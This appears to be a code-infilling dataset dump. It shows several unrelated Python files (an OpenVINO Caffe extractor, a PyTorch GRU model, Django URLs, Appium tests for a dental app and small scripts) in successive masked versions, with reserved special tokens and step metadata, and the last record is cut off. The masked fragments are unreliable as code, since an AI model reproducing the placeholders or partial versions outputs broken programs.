math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',\n str(cp_x - radius) + 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n # self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,\n # outline='purple')\n\n",
"step-ids": [
18,
19,
20,
23,
25
]
}
|
[
18,
19,
20,
23,
25
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpFrontExtractor(FrontExtractorOp):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def extract(cls, node):
proto_layer = node.pb
param = proto_layer.interp_param
update_attrs = {'height': param.height, 'width': param.width,
'zoom_factor': param.zoom_factor, 'shrink_factor': param.
shrink_factor}
mapping_rule = merge_attrs(param, update_attrs)
mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':
int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':
param.pad_end, 'align_corners': 1})
Interpolate.update_node_stat(node, mapping_rule)
return cls.enabled
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpFrontExtractor(FrontExtractorOp):
op = 'Interp'
enabled = True
@classmethod
def extract(cls, node):
proto_layer = node.pb
param = proto_layer.interp_param
update_attrs = {'height': param.height, 'width': param.width,
'zoom_factor': param.zoom_factor, 'shrink_factor': param.
shrink_factor}
mapping_rule = merge_attrs(param, update_attrs)
mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':
int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':
param.pad_end, 'align_corners': 1})
Interpolate.update_node_stat(node, mapping_rule)
return cls.enabled
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from extensions.ops.interpolate import Interpolate
from mo.front.caffe.collect_attributes import merge_attrs
from mo.front.common.partial_infer.utils import int64_array
from mo.front.extractor import FrontExtractorOp
class InterpFrontExtractor(FrontExtractorOp):
op = 'Interp'
enabled = True
@classmethod
def extract(cls, node):
proto_layer = node.pb
param = proto_layer.interp_param
update_attrs = {'height': param.height, 'width': param.width,
'zoom_factor': param.zoom_factor, 'shrink_factor': param.
shrink_factor}
mapping_rule = merge_attrs(param, update_attrs)
mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':
int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':
param.pad_end, 'align_corners': 1})
Interpolate.update_node_stat(node, mapping_rule)
return cls.enabled
<|reserved_special_token_1|>
"""
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from extensions.ops.interpolate import Interpolate
from mo.front.caffe.collect_attributes import merge_attrs
from mo.front.common.partial_infer.utils import int64_array
from mo.front.extractor import FrontExtractorOp
class InterpFrontExtractor(FrontExtractorOp):
op = 'Interp'
enabled = True
@classmethod
def extract(cls, node):
proto_layer = node.pb
param = proto_layer.interp_param
update_attrs = {
'height': param.height,
'width': param.width,
'zoom_factor': param.zoom_factor,
'shrink_factor': param.shrink_factor,
}
mapping_rule = merge_attrs(param, update_attrs)
mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes': int64_array([2, 3]),
'pads_begin': param.pad_beg, 'pads_end': param.pad_end, 'align_corners': 1})
Interpolate.update_node_stat(node, mapping_rule)
return cls.enabled
|
flexible
|
{
"blob_id": "ce28462621a423c6661c672cf92d7e9c91875cfa",
"index": 8247,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n <mask token>\n <mask token>\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n update_attrs = {'height': param.height, 'width': param.width,\n 'zoom_factor': param.zoom_factor, 'shrink_factor': param.\n shrink_factor}\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':\n int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':\n param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-3": "<mask token>\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n op = 'Interp'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n update_attrs = {'height': param.height, 'width': param.width,\n 'zoom_factor': param.zoom_factor, 'shrink_factor': param.\n shrink_factor}\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':\n int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':\n param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-4": "<mask token>\nfrom extensions.ops.interpolate import Interpolate\nfrom mo.front.caffe.collect_attributes import merge_attrs\nfrom mo.front.common.partial_infer.utils import int64_array\nfrom mo.front.extractor import FrontExtractorOp\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n op = 'Interp'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n update_attrs = {'height': param.height, 'width': param.width,\n 'zoom_factor': param.zoom_factor, 'shrink_factor': param.\n shrink_factor}\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':\n int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':\n param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-5": "\"\"\"\n Copyright (C) 2018-2020 Intel Corporation\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom extensions.ops.interpolate import Interpolate\nfrom mo.front.caffe.collect_attributes import merge_attrs\nfrom mo.front.common.partial_infer.utils import int64_array\nfrom mo.front.extractor import FrontExtractorOp\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n op = 'Interp'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n\n update_attrs = {\n 'height': param.height,\n 'width': param.width,\n 'zoom_factor': param.zoom_factor,\n 'shrink_factor': param.shrink_factor,\n }\n\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes': int64_array([2, 3]),\n 'pads_begin': param.pad_beg, 'pads_end': param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
##Arithmatic Progression
a = int(input ('Enter first number: '))
d = int(input('Enter common difference: '))
n = int(input('Number of term: '))
tn = a
while tn <= a + (n - 1) * d:
print(tn, end=" ")
tn += d
|
normal
|
{
"blob_id": "e748261d1e5fd7921a022afefe5a5bea1fbfc67c",
"index": 9095,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile tn <= a + (n - 1) * d:\n print(tn, end=' ')\n tn += d\n",
"step-3": "a = int(input('Enter first number: '))\nd = int(input('Enter common difference: '))\nn = int(input('Number of term: '))\ntn = a\nwhile tn <= a + (n - 1) * d:\n print(tn, end=' ')\n tn += d\n",
"step-4": "##Arithmatic Progression\r\n\r\na = int(input ('Enter first number: '))\r\nd = int(input('Enter common difference: '))\r\nn = int(input('Number of term: '))\r\n\r\ntn = a\r\n\r\nwhile tn <= a + (n - 1) * d:\r\n print(tn, end=\" \")\r\n tn += d\r\n \r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
arrayMapPath = 'C:\\Python27\\Lib\\site-packages\\ticketpitcher\\data'
tempPath = 'd:\\temp\\'
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 14 22:09:56 2014
@author: duhan
"""
#arrayMapPath = r'/usr/local/lib/python2.7/dist-packages/ticketpitcher/data/3'
arrayMapPath = r'C:\Python27\Lib\site-packages\ticketpitcher\data'
#tempPath = r'/tmp/'
tempPath = 'd:\\temp\\'
|
flexible
|
{
"blob_id": "9627e8a468d3a75787c5a9e01856913fc8beb3c4",
"index": 1868,
"step-1": "<mask token>\n",
"step-2": "<mask token>\narrayMapPath = 'C:\\\\Python27\\\\Lib\\\\site-packages\\\\ticketpitcher\\\\data'\ntempPath = 'd:\\\\temp\\\\'\n",
"step-3": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 14 22:09:56 2014\n\n@author: duhan\n\"\"\"\n#arrayMapPath = r'/usr/local/lib/python2.7/dist-packages/ticketpitcher/data/3'\narrayMapPath = r'C:\\Python27\\Lib\\site-packages\\ticketpitcher\\data'\n#tempPath = r'/tmp/'\ntempPath = 'd:\\\\temp\\\\'\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Model(nn.Module):
<|reserved_special_token_0|>
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
<|reserved_special_token_0|>
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,
**kw):
super(Model, self).__init__()
fc_embedding = []
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.
pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(
hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer,
False, True, bidirectional=is_bidir)
self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(
is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(
hidden_size, hidden_size // step), nn.Linear(hidden_size //
step, 1))
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
<|reserved_special_token_0|>
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,
**kw):
super(Model, self).__init__()
fc_embedding = []
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.
pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(
hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer,
False, True, bidirectional=is_bidir)
self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(
is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(
hidden_size, hidden_size // step), nn.Linear(hidden_size //
step, 1))
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
def train_batch(self, input_seq, target_seq, category, optimizer, logger):
"""
doc:
train the model with given data and optimizer, return log info
param:
input_seq: torch.LongTensor, [batch, max_seq_len]
target_seq: torch.LongTensor, [batch, max_seq_len]
optimizer: optimizer object
logger: logger object
"""
seq_pred = self.forward(input_seq, target_seq)
loss = self._loss_fn(seq_pred, target_seq)
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item(), seq_pred
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,
**kw):
super(Model, self).__init__()
fc_embedding = []
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.
pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(
hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer,
False, True, bidirectional=is_bidir)
self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(
is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(
hidden_size, hidden_size // step), nn.Linear(hidden_size //
step, 1))
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
def train_batch(self, input_seq, target_seq, category, optimizer, logger):
"""
doc:
train the model with given data and optimizer, return log info
param:
input_seq: torch.LongTensor, [batch, max_seq_len]
target_seq: torch.LongTensor, [batch, max_seq_len]
optimizer: optimizer object
logger: logger object
"""
seq_pred = self.forward(input_seq, target_seq)
loss = self._loss_fn(seq_pred, target_seq)
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item(), seq_pred
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False, **kw):
super(Model, self).__init__()
fc_embedding = []
# First, we should convert the 1 dim data to a higher dim
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, False, True,
bidirectional=is_bidir)
self.decoder = nn.Sequential(
nn.Linear(encoder_layer * (int(is_bidir) + 1) * hidden_size, hidden_size),
nn.Linear(hidden_size, hidden_size // step),
nn.Linear(hidden_size // step, 1),
)
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
def train_batch(self, input_seq, target_seq, category, optimizer, logger):
"""
doc:
train the model with given data and optimizer, return log info
param:
input_seq: torch.LongTensor, [batch, max_seq_len]
target_seq: torch.LongTensor, [batch, max_seq_len]
optimizer: optimizer object
logger: logger object
"""
seq_pred = self.forward(input_seq, target_seq)
loss = self._loss_fn(seq_pred, target_seq)
# optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss.item(), seq_pred
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
|
flexible
|
{
"blob_id": "188f82b0fb04d6814d77617fa9148113d0e6ef01",
"index": 2170,
"step-1": "<mask token>\n\n\nclass Model(nn.Module):\n <mask token>\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n <mask token>\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in the form of batch or single isinstance\n \"\"\"\n return self.forward(input_seq, None)\n",
"step-2": "<mask token>\n\n\nclass Model(nn.Module):\n\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,\n **kw):\n super(Model, self).__init__()\n fc_embedding = []\n for i in range(int(math.log(hidden_size, step))):\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.\n pow(step, i + 1))))\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(\n hidden_size, step)))), hidden_size))\n self.fc_embedding = nn.Sequential(*fc_embedding)\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, \n False, True, bidirectional=is_bidir)\n self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(\n is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(\n hidden_size, hidden_size // step), nn.Linear(hidden_size //\n step, 1))\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n <mask token>\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in the form of batch or single isinstance\n \"\"\"\n return self.forward(input_seq, None)\n",
"step-3": "<mask token>\n\n\nclass Model(nn.Module):\n\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,\n **kw):\n super(Model, self).__init__()\n fc_embedding = []\n for i in range(int(math.log(hidden_size, step))):\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.\n pow(step, i + 1))))\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(\n hidden_size, step)))), hidden_size))\n self.fc_embedding = nn.Sequential(*fc_embedding)\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, \n False, True, bidirectional=is_bidir)\n self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(\n is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(\n hidden_size, hidden_size // step), nn.Linear(hidden_size //\n step, 1))\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n\n def train_batch(self, input_seq, target_seq, category, optimizer, logger):\n \"\"\"\n doc:\n train the model with given data and optimizer, return log info\n param:\n input_seq: torch.LongTensor, [batch, max_seq_len]\n target_seq: torch.LongTensor, [batch, max_seq_len]\n optimizer: optimizer object\n logger: logger object\n \"\"\"\n seq_pred = self.forward(input_seq, target_seq)\n loss = self._loss_fn(seq_pred, target_seq)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return loss.item(), seq_pred\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in the form of batch or single isinstance\n \"\"\"\n return self.forward(input_seq, None)\n",
"step-4": "import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Model(nn.Module):\n\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,\n **kw):\n super(Model, self).__init__()\n fc_embedding = []\n for i in range(int(math.log(hidden_size, step))):\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.\n pow(step, i + 1))))\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(\n hidden_size, step)))), hidden_size))\n self.fc_embedding = nn.Sequential(*fc_embedding)\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, \n False, True, bidirectional=is_bidir)\n self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(\n is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(\n hidden_size, hidden_size // step), nn.Linear(hidden_size //\n step, 1))\n\n def forward(self, input_seq, target_seq=None):\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\n _, encoding_result = self.encoder(input_seq)\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\n encoding_result = torch.reshape(encoding_result, [encoding_result.\n shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\n seq_pred = self.decoder(encoding_result)\n return seq_pred.squeeze(1)\n\n def _loss_fn(self, seq_pred, target_seq):\n return F.mse_loss(seq_pred, target_seq)\n\n def train_batch(self, input_seq, target_seq, category, optimizer, logger):\n \"\"\"\n doc:\n train the model with given data and optimizer, return log info\n param:\n input_seq: torch.LongTensor, [batch, max_seq_len]\n target_seq: torch.LongTensor, [batch, max_seq_len]\n optimizer: optimizer object\n logger: logger object\n \"\"\"\n seq_pred = self.forward(input_seq, target_seq)\n loss = self._loss_fn(seq_pred, target_seq)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n return loss.item(), seq_pred\n\n def infer_batch(self, input_seq, logger):\n \"\"\"\n model inference.\n The given data can be in the form of batch or single isinstance\n \"\"\"\n return self.forward(input_seq, None)\n",
"step-5": "import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\n\r\nclass Model(nn.Module):\r\n\r\n def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False, **kw):\r\n super(Model, self).__init__()\r\n fc_embedding = []\r\n\r\n # First, we should convert the 1 dim data to a higher dim\r\n for i in range(int(math.log(hidden_size, step))):\r\n fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.pow(step, i + 1))))\r\n fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(hidden_size, step)))), hidden_size))\r\n self.fc_embedding = nn.Sequential(*fc_embedding)\r\n self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer, False, True,\r\n bidirectional=is_bidir)\r\n\r\n self.decoder = nn.Sequential(\r\n nn.Linear(encoder_layer * (int(is_bidir) + 1) * hidden_size, hidden_size),\r\n nn.Linear(hidden_size, hidden_size // step),\r\n nn.Linear(hidden_size // step, 1),\r\n )\r\n\r\n def forward(self, input_seq, target_seq=None):\r\n input_seq = self.fc_embedding(input_seq.unsqueeze(-1))\r\n _, encoding_result = self.encoder(input_seq)\r\n encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()\r\n encoding_result = torch.reshape(encoding_result, [encoding_result.shape[0], encoding_result.shape[1] * encoding_result.shape[2]])\r\n seq_pred = self.decoder(encoding_result)\r\n return seq_pred.squeeze(1)\r\n\r\n def _loss_fn(self, seq_pred, target_seq):\r\n return F.mse_loss(seq_pred, target_seq)\r\n\r\n def train_batch(self, input_seq, target_seq, category, optimizer, logger):\r\n \"\"\"\r\n doc:\r\n train the model with given data and optimizer, return log info\r\n param:\r\n input_seq: torch.LongTensor, [batch, max_seq_len]\r\n target_seq: torch.LongTensor, [batch, max_seq_len]\r\n optimizer: optimizer object\r\n logger: logger object\r\n \"\"\"\r\n seq_pred = self.forward(input_seq, target_seq)\r\n loss = self._loss_fn(seq_pred, target_seq)\r\n\r\n # optimize\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n return loss.item(), seq_pred\r\n\r\n def infer_batch(self, input_seq, logger):\r\n \"\"\"\r\n model inference.\r\n The given data can be in the form of batch or single isinstance\r\n \"\"\"\r\n return self.forward(input_seq, None)\r\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.conf.urls import url
from .views import LoginView, logout_user, delete_user
from .views import NewUserView
urlpatterns = [
url(r'newuser/', NewUserView.as_view(), name='newuser'),
url(r'login/', LoginView.as_view(), name='login'),
url(r'logout/', logout_user, name='logout'),
url(r'delete/$', delete_user, name='deleteuser'),
]
|
normal
|
{
"blob_id": "9b4bc7f8f9c96f503a5ed79827430963e21718c4",
"index": 3733,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('newuser/', NewUserView.as_view(), name='newuser'), url(\n 'login/', LoginView.as_view(), name='login'), url('logout/',\n logout_user, name='logout'), url('delete/$', delete_user, name=\n 'deleteuser')]\n",
"step-3": "from django.conf.urls import url\nfrom .views import LoginView, logout_user, delete_user\nfrom .views import NewUserView\nurlpatterns = [url('newuser/', NewUserView.as_view(), name='newuser'), url(\n 'login/', LoginView.as_view(), name='login'), url('logout/',\n logout_user, name='logout'), url('delete/$', delete_user, name=\n 'deleteuser')]\n",
"step-4": "from django.conf.urls import url\nfrom .views import LoginView, logout_user, delete_user\nfrom .views import NewUserView\n\nurlpatterns = [\n url(r'newuser/', NewUserView.as_view(), name='newuser'),\n url(r'login/', LoginView.as_view(), name='login'),\n url(r'logout/', logout_user, name='logout'),\n url(r'delete/$', delete_user, name='deleteuser'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()
driver.find_element_by_id('com.dentist.android:id/select_city_layout'
).click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
<|reserved_special_token_0|>
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()
driver.find_element_by_name('23:00').click()
driver.find_element_by_name('00').click()
driver.find_element_by_name('15分钟').click()
driver.find_element_by_name('完成').click()
def data(driver):
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()
driver.find_element_by_name('完成').click()
def patient(driver):
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()
driver.find_element_by_id('com.dentist.android:id/select_city_layout'
).click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
